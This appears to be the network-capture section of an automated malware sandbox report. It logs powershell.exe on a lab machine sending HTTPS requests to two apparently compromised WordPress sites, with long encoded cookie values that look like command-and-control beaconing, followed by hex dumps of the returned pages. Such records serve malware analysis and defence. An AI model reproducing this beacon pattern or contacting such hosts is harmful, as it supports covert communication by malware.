                                                    2024-12-18 10:22:17 UTC1369INData Raw: 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 77 69 64 74 68 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 6d 61 72 67 69 6e 3a 20 30 20 30 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 70 61 64 64 69 6e 67 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e
                                                    Data Ascii: important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}</style>
                                                    2024-12-18 10:22:17 UTC1369INData Raw: 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 66 6f 6f 74 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 2e 32 35 65 6d 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 37 35 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e
                                                    Data Ascii: block-pullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.
                                                    2024-12-18 10:22:17 UTC1369INData Raw: 6f 6e 29 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 3a 77 68 65 72 65 28 66 69 67 63 61 70 74 69 6f 6e 29 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 3a 77 68 65 72 65 28 66 69 67 63 61 70 74 69 6f 6e 29 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 3a 77 68 65 72 65 28 66 69 67 63 61 70 74 69 6f 6e 29 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66
                                                    Data Ascii: on){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table :where(figcaption){color:#ffffffa6}.wp-block-video :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video :where(figcaption){color:#fffff


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    27192.168.11.2049741104.21.10.2244431972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:22:28 UTC2246OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVQTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQbChI/fknpusOUQ2y/9/xsK2c7RzxnigJR/Lgxzs5ZrfVSr69mzmD02gUIc9Y4y3UYFqyoNcwZts0ojoWEMKC65/k2opZBC795E6Uc1F8OCm/5d4df9CvSVCX7LRgXpifhjA9AhGmUXdNEitCoLge371PFwtr7VfEhxOqE9uHs3RUCdaD1nJVRD5Yrjj3 [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: alseraj.net
                                                    Connection: Close
                                                    2024-12-18 10:22:28 UTC834INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:22:28 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Last-Modified: Wed, 18 Dec 2024 09:38:26 GMT
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TkDDMtA0lhzqZdwPhzwGXQYuJi%2B8hBJDiOYgTbKD1LHEuAPcOlMUlgBupOpDSmAXUe1kQoBNQqh4c4aASLGsd1pMYIQqIBK8Vt7Vfge1mHFFTqFADiwJUnrB0hNb%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8f3e6e931b63afc0-ATL
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=140860&min_rtt=140759&rtt_var=29846&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2828&recv_bytes=2865&delivery_rate=27153&cwnd=252&unsent_bytes=0&cid=5c1058f960d13167&ts=844&x=0"
                                                    2024-12-18 10:22:28 UTC535INData Raw: 37 64 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 72 74 6c 22 20 6c 61 6e 67 3d 22 61 72 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 7a 65
                                                    Data Ascii: 7d3a<!DOCTYPE html><html dir="rtl" lang="ar" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"> <style>img:is([size
                                                    2024-12-18 10:22:28 UTC1369INData Raw: 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 d8 b4 d8 a8 d9 83 d8 a9 20 d8 a7 d9 84 d8 b3 d8 b1 d8 a7 d8 ac 20 d9 81 d9 8a 20 d8 a7 d9 84 d8 b7 d8 b1 d9 8a d9 82 20 d8 a7 d9 84 d9 89 20 d8 a7 d9 84 d9 84 d9 87 d8 9b 20 d9 85 d9 88 d9 82 d8 b9 20 d8 ab d9 82 d8 a7 d9 81 d9 8a d8 8c 20 d8 a5 d8 b9 d9 84 d8 a7 d9 85 d9 8a 20 d9 88 d8 aa d8 a8 d9 84 d9 8a d8 ba d9 8a d8 8c 20 d9 8a d9 87 d8 af d9 81 20 d9 84 d9 86 d8 b4 d8 b1 20 d9 85 d8 b9 d8 a7 d8 b1 d9 81 20 d8 a7 d9 84 d8 a5 d8 b3 d9 84 d8 a7 d9 85 20 d8 a7 d9 84 d9 85 d8 ad d9 85 d9 91 d8 af d9 8a 20 d9 88 d8 aa d8 b1 d9 88 d9 8a d8 ac 20 d8 a7 d9 84 d8 ab d9 91 d9 82 d8 a7 d9 81 d8 a9 20 d8 a7 d9 84 d8 af d9 91 d9 8a d9 86 d9 8a d9 91
                                                    Data Ascii: le><meta name="description" content="
                                                    2024-12-18 10:22:28 UTC1369INData Raw: d8 b1 d8 a7 d8 ac 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 70 64 61 74 65 64 5f 74 69 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 32 30 32 34 2d 31 32 2d 31 38 54 31 30 3a 32 36 3a 32 37 2b 30 33 3a 30 30 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 61 6c 73 65 72 61 6a 2e 6a 70 67 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 73 65 63 75 72 65 5f 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 2f 77 70 2d 63 6f 6e 74 65
                                                    Data Ascii: " /><meta property="og:updated_time" content="2024-12-18T10:26:27+03:00" /><meta property="og:image" content="https://alseraj.net/wp-content/uploads/2023/01/alseraj.jpg" /><meta property="og:image:secure_url" content="https://alseraj.net/wp-conte
                                                    2024-12-18 10:22:28 UTC1369INData Raw: 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 61 6c 73 65 72 61 6a 2e 6a 70 67 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 6c 61 62 65 6c 31 22 20 63 6f 6e 74 65 6e 74 3d 22 d9 83 d9 8f d8 aa d8 a8 20 d8 a8 d9 88 d8 a7 d8 b3 d8 b7 d8 a9 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 61 74 61 31 22 20 63 6f 6e 74 65 6e 74 3d 22 73 65 72 61 64 6f 74 74 69 6e 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 6c 61 62 65 6c 32 22 20 63 6f 6e 74 65 6e 74 3d 22 d9 85 d8 af d8 a9 20 d8 a7 d9 84 d9 82 d8 b1 d8 a7 d8 a1 d8 a9 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 61 74 61 32 22 20 63 6f 6e 74 65 6e 74 3d 22
                                                    Data Ascii: p-content/uploads/2023/01/alseraj.jpg" /><meta name="twitter:label1" content=" " /><meta name="twitter:data1" content="seradottin" /><meta name="twitter:label2" content=" " /><meta name="twitter:data2" content="
                                                    2024-12-18 10:22:28 UTC1369INData Raw: 5c 75 30 36 32 39 20 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 33 5c 75 30 36 33 31 5c 75 30 36 32 37 5c 75 30 36 32 63 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 2f 23 70 65 72 73 6f 6e 22 7d 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 61 72 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22 2c 22 71 75 65 72 79 2d 69 6e 70 75 74 22 3a 22 72 65 71 75 69 72 65 64 20 6e 61 6d 65 3d 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69
                                                    Data Ascii: \u0629 \u0627\u0644\u0633\u0631\u0627\u062c","publisher":{"@id":"https://alseraj.net/#person"},"inLanguage":"ar","potentialAction":{"@type":"SearchAction","target":"https://alseraj.net/?s={search_term_string}","query-input":"required name=search_term_stri
                                                    2024-12-18 10:22:28 UTC1369INData Raw: 61 6e 6b 26 61 6d 70 3b 72 3d 67 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 65 63 75 72 65 2e 67 72 61 76 61 74 61 72 2e 63 6f 6d 2f 61 76 61 74 61 72 2f 66 63 31 32 62 65 39 35 37 63 65 62 39 32 39 32 32 61 32 32 39 64 63 37 61 37 31 63 61 38 30 30 3f 73 3d 39 36 26 61 6d 70 3b 64 3d 62 6c 61 6e 6b 26 61 6d 70 3b 72 3d 67 22 2c 22 63 61 70 74 69 6f 6e 22 3a 22 73 65 72 61 64 6f 74 74 69 6e 22 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 61 72 22 7d 2c 22 73 61 6d 65 41 73 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 61 62 69 62 61 6c 6b 61 7a 65 6d 69 2e 63 6f 6d 22 5d 7d 2c 7b 22 68 65 61 64 6c 69 6e 65 22 3a 22 5c 75 30 36 33 34 5c 75 30 36 32 38 5c 75 30 36 34 33 5c 75 30 36 32 39 20 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33
                                                    Data Ascii: ank&amp;r=g","url":"https://secure.gravatar.com/avatar/fc12be957ceb92922a229dc7a71ca800?s=96&amp;d=blank&amp;r=g","caption":"seradottin","inLanguage":"ar"},"sameAs":["https://www.habibalkazemi.com"]},{"headline":"\u0634\u0628\u0643\u0629 \u0627\u0644\u063
                                                    2024-12-18 10:22:28 UTC1369INData Raw: 75 30 36 34 35 5c 75 30 36 32 34 5c 75 30 36 34 34 5c 75 30 36 35 31 5c 75 30 36 34 31 5c 75 30 36 32 37 5c 75 30 36 32 61 20 5c 75 30 36 33 33 5c 75 30 36 34 35 5c 75 30 36 32 37 5c 75 30 36 32 64 5c 75 30 36 32 39 20 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 34 5c 75 30 36 35 31 5c 75 30 36 34 61 5c 75 30 36 32 65 20 5c 75 30 36 32 64 5c 75 30 36 32 38 5c 75 30 36 34 61 5c 75 30 36 32 38 20 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 34 33 5c 75 30 36 32 37 5c 75 30 36 33 38 5c 75 30 36 34 35 5c 75 30 36 34 61 2e 22 2c 22 64 61 74 65 50 75 62 6c 69 73 68 65 64 22 3a 22 32 30 32 32 2d 30 32 2d 30 36 54 30 31 3a 34 30 3a 30 31 2b 30 33 3a 30 30 22 2c 22 64 61 74 65 4d 6f 64 69 66 69 65 64 22 3a 22 32 30 32 34 2d 31 32 2d 31 38 54 31 30 3a 32
                                                    Data Ascii: u0645\u0624\u0644\u0651\u0641\u0627\u062a \u0633\u0645\u0627\u062d\u0629 \u0627\u0644\u0634\u0651\u064a\u062e \u062d\u0628\u064a\u0628 \u0627\u0644\u0643\u0627\u0638\u0645\u064a.","datePublished":"2022-02-06T01:40:01+03:00","dateModified":"2024-12-18T10:2
                                                    2024-12-18 10:22:28 UTC1369INData Raw: 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 37 2e 31 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28
                                                    Data Ascii: e\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/alseraj.net\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(
                                                    2024-12-18 10:22:28 UTC1369INData Raw: 65 71 75 65 6e 74 6c 79 3a 21 30 7d 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 28 61 2c 65 2c 6e 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74
                                                    Data Ascii: equently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupport
                                                    2024-12-18 10:22:28 UTC1369INData Raw: 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 65 3d 6e 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f
                                                    Data Ascii: ts.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemo


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    28192.168.11.2049742197.189.243.2124438988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:22:39 UTC2255OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVQTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQbChI/fknpusOUQ2y/9/xsK2c7RzxnigJR/Lgxzs5ZrfVSr69mzmD02gUIc9Y4y3UYFqyoNcwZts0ojoWEMKC65/k2opZBC795E6Uc1F8OCm/5d4df9CvSVCX7LRgXpifhjA9AhGmUXdNEitCoLge371PFwtr7VfEhxOqE9uHs3RUCdaD1nJVRD5Yrjj3 [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: thezoneheights.co.za
                                                    Connection: Close
                                                    2024-12-18 10:22:41 UTC485INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:22:39 GMT
                                                    Server: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fips
                                                    X-Powered-By: PHP/7.4.8
                                                    Link: <https://thezoneheights.co.za/wp-json/>; rel="https://api.w.org/", <https://thezoneheights.co.za/wp-json/wp/v2/pages/113>; rel="alternate"; title="JSON"; type="application/json", <https://thezoneheights.co.za/>; rel=shortlink
                                                    Vary: Accept-Encoding,User-Agent
                                                    Connection: close
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    2024-12-18 10:22:41 UTC7707INData Raw: 32 66 66 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 54 68 65 20 5a 6f 6e 65 20 48 65 69 67 68 74 73 20 26 23 38 32 31 31 3b 20 54 68 65 20 7a 7a 6f 6e 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61
                                                    Data Ascii: 2ff6<!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>The Zone Heights &#8211; The zzone</title><meta na
                                                    2024-12-18 10:22:42 UTC4577INData Raw: 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6f 75 74 6c 69 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 63 72 69 73 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78
                                                    Data Ascii: 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex
                                                    2024-12-18 10:22:42 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
